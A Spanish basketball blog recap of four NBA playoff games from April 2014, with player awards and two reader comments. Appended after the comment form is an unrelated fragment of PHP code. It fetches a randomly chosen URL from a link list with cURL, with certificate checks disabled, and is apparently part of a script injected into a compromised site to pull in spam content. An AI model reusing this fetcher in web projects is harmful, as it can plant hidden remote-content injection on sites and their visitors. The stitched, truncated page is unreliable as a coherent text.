La Crónica: Viviendo peligrosamente

27 de April de 2014 por TheDeerHunter

I love this game! Qué buenos están siendo estos playoffs, y anoche vivimos  el mejor ejemplo de ellos. Tres de cuatro choques no aptos para cardíacos. “This is f..cking playoffs” que dijo Popovich. Sólo los más fuertes sobreviven.

Duelo de titanes en el American Airlines de Dallas. Intercambio de golpes entre dos exponentes del juego ofensivo/colectivo. No había defensa posible ante la inspiración y el talento desatados, en comunión con unos sistemas tácticos a la altura. Llegamos a perder la cuenta de cuantas alternancias hubo en el marcador. Lo mejor es que esa fue la tónica del primero al último minuto, literal. Y para colmo la emoción y el acierto fue in crescendo. El último cuarto es lo mejor que hemos visto este año. Desde el empate a 85 a falta de casi 9 minutos se producen 24 cambios en el marcador, con 12 jugadores involucrados. El hombre del momento fue Monta Ellis, en la mejor actuación de playoffs de su carrera. Imparable frente al coral juego de pase de San Antonio, que se las arreglaron para que Manudona anotara una canasta aparentemente ganadora a falta de segundo y medio. No nos dejaron ni parpadear. Saque de banda y balón a la esquina para Vinsanity. En un alarde de sangre fría finta, pica Ginobili y triplazo. Los Mavs ganan la batalla.

Viajamos a Memphis, con los Thunder contra las cuerdas. Aún viajamos más en el cambio de estilo, con barro y trincheras pero idéntica épica y emoción. Hace un par de días pedíamos más participación de otros en el juego de los Thunder. Ayer hubieran claudicado sólo con Durant y Westbrook, maniatados. El milagro vino en las manos de Reggie Jackson, demostradamente capacitado para este tipo de situaciones límite. Logró empatar él solo el encuentro cuando llegaron a ir 5 abajo en los 2 minutos finales. Esta vez los Grizzlies no arrasaron en la prórroga como venían haciendo. Al contrario, sólo Marc se libró del atasco. Eso sí, se acordarán de los 10 tiros libres marrados y de un par de errores decisivos en los momentos más calientes.

También oportunidad de oro desperdiciada por los Hawks. Llegaron a tener seminoqueados a los Pacers, con un Stephenson inoperante y Hibbert perdido para la causa, aparentemente más cómodo como agitatoallas que como referencia de su equipo. Pudimos apreciar mejoría ofensiva en el resto de jugadores y gracias a ello resistieron las arremetidas de Millsap y compañía. Vogel encomendaba su destino a la experiencia de Scola, West y George Hill, pero los Hawks amagaban con escaparse a falta de 5 minutos, con triples de Teague y Korver. Los rostros de unos y otros no presagiaban los que iba a terminar ocurriendo. Un arranque de piedad de los locales, quienes no anotaban ninguna canasta en juego más y se dedicaban a perder balón tras balón ante la atónita mirada de su público. Tres triples de Hill, George y West ponían a los Pacers por delante a falta de minuto y medio. Aunque aún se esforzaron por complicarse la vida, arañaron la victoria que les devuelve la ventaja campo, sin excesivo merecimiento.

Finalmente los Heat lo dejaron todo preparado para barrer a los Bobcats. Ya demarraron a mediados del segundo cuarto con LeBron desafiante ante Jordan. Por lo demás sin mayor historia.

PREMIOS

MVP: Dicen que quien a espada mata a espada muere. El tipo de cosas que le encantaba hacer a Jordan le tocó catarlo ayer en sus carnes. LeBron James le vaciló todo lo que pudo y más. 30 puntos, 10 rebotes, 6 asistencias y mirandole a los ojitos. Monta Ellis y Reggie Jackson fueron los otros nombres del día.

Sorpresa: No es porque su actuación nos sorprenda tanto como que le dejaran hacerlo. No es frecuente que Durant y Westbrook cedan protagonismo a nadie. Le deben una bien gorda a Reggie Jackson. Si no es por sus 32 puntos, 9 rebotes… igual estarían empezando a mirarse las vacaciones. El triplazo de Vince Carter también fue de los que quitan el hipo.

Decepción: Sólo hubiera bastado con un poquito más de Zach Randolph. Bastante olvidable su noche, especialmente con su 1 de 5 en los tiros libres. También 5 de 14 en tiros de campo.

Esfuerzo en vano: La tuvo ahí Paul Millsap. 29 puntos, incluidos 3 triples, 7 rebotes, 3 tapones, 2 asistencias y 1 robo. Está siendo una auténtica pesadilla para los Pacers.

Comenta

2 comentarios a esta entrada

  1. el rey lagarto dice:
    #1

    Una falta de respeto a uno de los más grandes. LJames demuestra que es un endiosado una vez más. Hoy por hoy, Jordan tiene más CV que él. No sé cuando se retire el niñato, pero hoy por hoy es así.

      Citar

  2. rumbero dice:
    #2

    Ojo con Curry que está en modo “empapado en crack”. A ver cuantos triples mete, lleva un 5/6 en 9 minutos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>